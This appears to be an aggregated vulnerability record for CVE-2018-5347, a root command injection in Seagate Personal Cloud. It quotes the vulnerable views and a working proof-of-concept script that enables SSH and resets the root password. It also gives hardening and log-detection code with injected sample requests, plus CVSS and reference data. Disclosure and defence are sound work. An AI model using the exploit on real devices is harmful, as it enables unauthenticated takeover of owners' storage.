ID

VAR-201801-1503


CVE

CVE-2018-5347


TITLE

Seagate Personal Cloud Seagate Media Server Command Injection Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2018-04347 // CNNVD: CNNVD-201801-562

DESCRIPTION

Seagate Media Server in Seagate Personal Cloud has unauthenticated command injection in the uploadTelemetry and getLogs functions in views.py because .psp URLs are handled by the fastcgi.server component and shell metacharacters are mishandled. Seagate Personal Cloud is a personal cloud storage device from Seagate, USA. Seagate Media Server is one of its media servers. An attacker could exploit this vulnerability to execute arbitrary commands with root privileges. Seagate Personal Cloud Home Media Storage is "the easiest way to store, organize, stream and share all your music, movies, photos, and important documents."

## Credit

An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.

## Vendor response

Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or to coordinate an advisory.

## Vulnerabilities details

Seagate Media Server uses the Django web framework and is mapped to the .psp extension. Any URL that ends with .psp is automatically sent to the Seagate Media Server application using the FastCGI protocol.

/etc/lighttpd/conf.d/django-host.conf:

```
fastcgi.server += (
    ".psp" => ((
        "socket" => "/var/run/manage_py-fastcgi.socket",
        "check-local" => "disable",
        "stream-post" => "enable",
        "allow-x-send-file" => "enable",
    )),
    ".psp/" => ((
        "socket" => "/var/run/manage_py-fastcgi.socket",
        "check-local" => "disable",
        "stream-post" => "enable",
        "allow-x-send-file" => "enable",
    ))
)
```

URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. Two views were found to be affected by unauthenticated command injection. The affected views are:

- uploadTelemetry
- getLogs

These views take user input from GET parameters and pass it unvalidated/unsanitized to methods of the commands Python module, which run the resulting string through /bin/sh.

/usr/lib/django_host/seagate_media_server/views.py:

```
@csrf_exempt
def uploadTelemetry(request):
    ts = request.GET.get('TimeStamp','')
    if (checkDBSQLite()) :
        response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
    else :
        if ts == "":
            response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
            return HttpResponse(response);
        cmd = "/usr/local/bin/log_telemetry "+str(ts)
        commands.getoutput(cmd)
        return HttpResponse('{"stat":"ok"}')
```

/usr/lib/django_host/seagate_media_server/views.py:

```
@csrf_exempt
def getLogs (request):
    try:
        cmd_base='/usr/bin/log-extract-manager.sh'
        uID = request.GET.get ( 'arch_id', None )
        time_stamp = request.GET.get ( 'time_stamp', '' )
        if uID:
            (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
            if ('In progress' in output) and (uID in output) :
                return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
            elif (status == 0) :
                return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
            else :
                return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
        else:
            (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
            if (status == 0) :
                return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
            return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
    except :
        return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
```

Note that both views carry the csrf_exempt decorator, which disables Django's default Cross-Site Request Forgery protection. As such, these issues can also be exploited via Cross-Site Request Forgery.

### Proof of Concept

The following proof of concept will try to enable the SSH service and change the root password. When successful it will be possible to log into the device over SSH with the new password.

```
#!/usr/bin/env python
import os
import urllib

scheme = 'http'
host = 'personalcloud.local'
port = '80'

path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'

#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'

password = 'Welcome01'
cmds = ['ngc --start sshd 2>&1', 'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]

for cmd in cmds:
    print 'Running command', repr(cmd)
    cmd = urllib.quote_plus(cmd)
    r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
    print r.read()

print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)
```
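The two things a defender wants from the details above are a handler that cannot reach a shell with attacker-controlled text, and a way to spot requests that did. The following is an added example, written for this record and not taken from the advisory or from Seagate's code: it re-implements the TimeStamp handling with an allow-list and a shell-free subprocess call (Python 3's subprocess stands in for the Python 2 commands module the device used), and it scans lighttpd-style access-log lines for requests to uploadTelemetry.psp or getLogs.psp whose tainted parameters carry shell metacharacters. The integer TimeStamp format is an assumption (the advisory does not state the format), the function names are the example's own, and the log lines are constructed.

```python
# Added example, not part of the advisory or of Seagate's code.
# Assumptions: TimeStamp is a plain integer epoch value; the sample log
# lines below are constructed; function names are this example's own.
import re
import subprocess
from urllib.parse import urlsplit, parse_qs

LOG_TELEMETRY = "/usr/local/bin/log_telemetry"   # helper path from the advisory
TIMESTAMP_RE = re.compile(r"[0-9]{1,20}")         # assumed format: integer epoch


def is_valid_timestamp(ts):
    """Allow-list check: only an integer-looking string is accepted."""
    return isinstance(ts, str) and TIMESTAMP_RE.fullmatch(ts) is not None


def build_telemetry_argv(ts, binary=LOG_TELEMETRY):
    """Return the argv list for the helper, or raise ValueError.

    The vulnerable view built one string and handed it to
    commands.getoutput(), i.e. to /bin/sh. An argv list run with
    shell=False is never parsed by a shell, so ';', '|', '`' and '$('
    cannot start a second command; the allow-list rejects them anyway.
    """
    if not is_valid_timestamp(ts):
        raise ValueError("TimeStamp rejected: %r" % (ts,))
    return [binary, ts]


def run_telemetry(ts, binary=LOG_TELEMETRY):
    """Hardened replacement for the cmd = "... " + str(ts) pattern."""
    argv = build_telemetry_argv(ts, binary)
    return subprocess.run(argv, shell=False, capture_output=True, timeout=30)


# --- detection over access logs -------------------------------------------
AFFECTED_VIEWS = {"uploadTelemetry.psp", "getLogs.psp"}
TAINTED_PARAMS = {"TimeStamp", "time_stamp", "arch_id"}
# Characters that let a value escape its argument once the string reaches
# /bin/sh via commands.getoutput()/getstatusoutput().
SHELL_META = set(";|&`$<>()\n")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample lines in lighttpd's default access-log format; the
# addresses, timestamps and query values are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 personalcloud.local - [16/Jan/2018:18:02:22 +0000] "GET /uploadTelemetry.psp?TimeStamp=1516125742 HTTP/1.1" 200 13
10.0.0.9 personalcloud.local - [16/Jan/2018:18:02:30 +0000] "GET /uploadTelemetry.psp?TimeStamp=%3b%20true HTTP/1.1" 200 13
10.0.0.9 personalcloud.local - [16/Jan/2018:18:02:31 +0000] "GET /getLogs.psp?time_stamp=1516125742%7ctrue HTTP/1.1" 200 56
10.0.0.7 personalcloud.local - [16/Jan/2018:18:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def tainted_params(request_target):
    """Return [(param, decoded_value)] carrying shell metacharacters for a
    request to one of the affected views; [] for anything else."""
    parts = urlsplit(request_target)
    # lighttpd routes both ".psp" and ".psp/" to the FastCGI socket.
    view = parts.path.rstrip("/").rsplit("/", 1)[-1]
    if view not in AFFECTED_VIEWS:
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in TAINTED_PARAMS:
            hits.extend((name, v) for v in values if SHELL_META & set(v))
    return hits


def scan_access_log(text):
    """Return a list of (client, param, decoded_value) per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            client = line.split(" ", 1)[0]
            findings.extend((client, p, v) for p, v in tainted_params(m.group(1)))
    return findings


if __name__ == "__main__":
    print(build_telemetry_argv("1516125742"))
    for finding in scan_access_log(SAMPLE_LOG):
        print("suspicious request from %s: %s=%r" % finding)
```

parse_qs percent-decodes the query, so the check sees the same bytes the shell would have seen; the metacharacter set is deliberately broad because any one of those characters is enough to turn a timestamp argument into a second command. The scanner only covers the two views named in the advisory and the three parameters they read, which keeps false positives low on a busy log.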

Trust: 2.43

sources: NVD: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // PACKETSTORM: 145932

IOT TAXONOMY

category: ['Network device']
sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-04347

AFFECTED PRODUCTS

vendor: seagate
model: personal cloud
scope: eq
version: -

Trust: 1.0

vendor: seagate
model: personal cloud
scope: -
version: -

Trust: 0.8

vendor: seagate
model: technology personal cloud
scope: -
version: -

Trust: 0.6

sources: CNVD: CNVD-2018-04347 // JVNDB: JVNDB-2018-001653 // NVD: CVE-2018-5347

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-5347
value: CRITICAL

Trust: 1.0

NVD: CVE-2018-5347
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-04347
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201801-562
value: CRITICAL

Trust: 0.6

VULHUB: VHN-135378
value: HIGH

Trust: 0.1

VULMON: CVE-2018-5347
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2018-5347
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-04347
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-135378
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-5347
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // CNNVD: CNNVD-201801-562 // NVD: CVE-2018-5347

PROBLEMTYPE DATA

problemtype: CWE-78

Trust: 1.1

problemtype: CWE-77

Trust: 0.9

sources: VULHUB: VHN-135378 // JVNDB: JVNDB-2018-001653 // NVD: CVE-2018-5347

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201801-562

TYPE

operating system command injection

Trust: 0.6

sources: CNNVD: CNNVD-201801-562

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-001653

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-135378 // VULMON: CVE-2018-5347

PATCH

title: Personal Cloud
url: https://www.seagate.com/jp/ja/consumer/backup/personal-cloud/

Trust: 0.8

sources: JVNDB: JVNDB-2018-001653

EXTERNAL IDS

db: NVD, id: CVE-2018-5347

Trust: 3.3

db: EXPLOIT-DB, id: 43659

Trust: 2.4

db: JVNDB, id: JVNDB-2018-001653

Trust: 0.8

db: CNNVD, id: CNNVD-201801-562

Trust: 0.7

db: CNVD, id: CNVD-2018-04347

Trust: 0.6

db: PACKETSTORM, id: 145932

Trust: 0.2

db: SEEBUG, id: SSVID-97283

Trust: 0.1

db: VULHUB, id: VHN-135378

Trust: 0.1

db: VULMON, id: CVE-2018-5347

Trust: 0.1

sources: CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // PACKETSTORM: 145932 // CNNVD: CNNVD-201801-562 // NVD: CVE-2018-5347

REFERENCES

url:https://blogs.securiteam.com/index.php/archives/3548

Trust: 3.2

url:https://www.exploit-db.com/exploits/43659/

Trust: 2.5

url:https://nvd.nist.gov/vuln/detail/cve-2018-5347

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5347

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/78.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

sources: CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // PACKETSTORM: 145932 // CNNVD: CNNVD-201801-562 // NVD: CVE-2018-5347

CREDITS

Yorick Koster

Trust: 0.1

sources: PACKETSTORM: 145932

SOURCES

db: CNVD, id: CNVD-2018-04347
db: VULHUB, id: VHN-135378
db: VULMON, id: CVE-2018-5347
db: JVNDB, id: JVNDB-2018-001653
db: PACKETSTORM, id: 145932
db: CNNVD, id: CNNVD-201801-562
db: NVD, id: CVE-2018-5347

LAST UPDATE DATE

2024-11-23T22:52:13.364000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2018-04347, date: 2018-03-06T00:00:00
db: VULHUB, id: VHN-135378, date: 2019-10-03T00:00:00
db: VULMON, id: CVE-2018-5347, date: 2019-10-03T00:00:00
db: JVNDB, id: JVNDB-2018-001653, date: 2018-02-28T00:00:00
db: CNNVD, id: CNNVD-201801-562, date: 2019-10-23T00:00:00
db: NVD, id: CVE-2018-5347, date: 2024-11-21T04:08:37.910

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2018-04347, date: 2018-03-06T00:00:00
db: VULHUB, id: VHN-135378, date: 2018-01-12T00:00:00
db: VULMON, id: CVE-2018-5347, date: 2018-01-12T00:00:00
db: JVNDB, id: JVNDB-2018-001653, date: 2018-02-28T00:00:00
db: PACKETSTORM, id: 145932, date: 2018-01-16T18:02:22
db: CNNVD, id: CNNVD-201801-562, date: 2018-01-16T00:00:00
db: NVD, id: CVE-2018-5347, date: 2018-01-12T01:29:00.200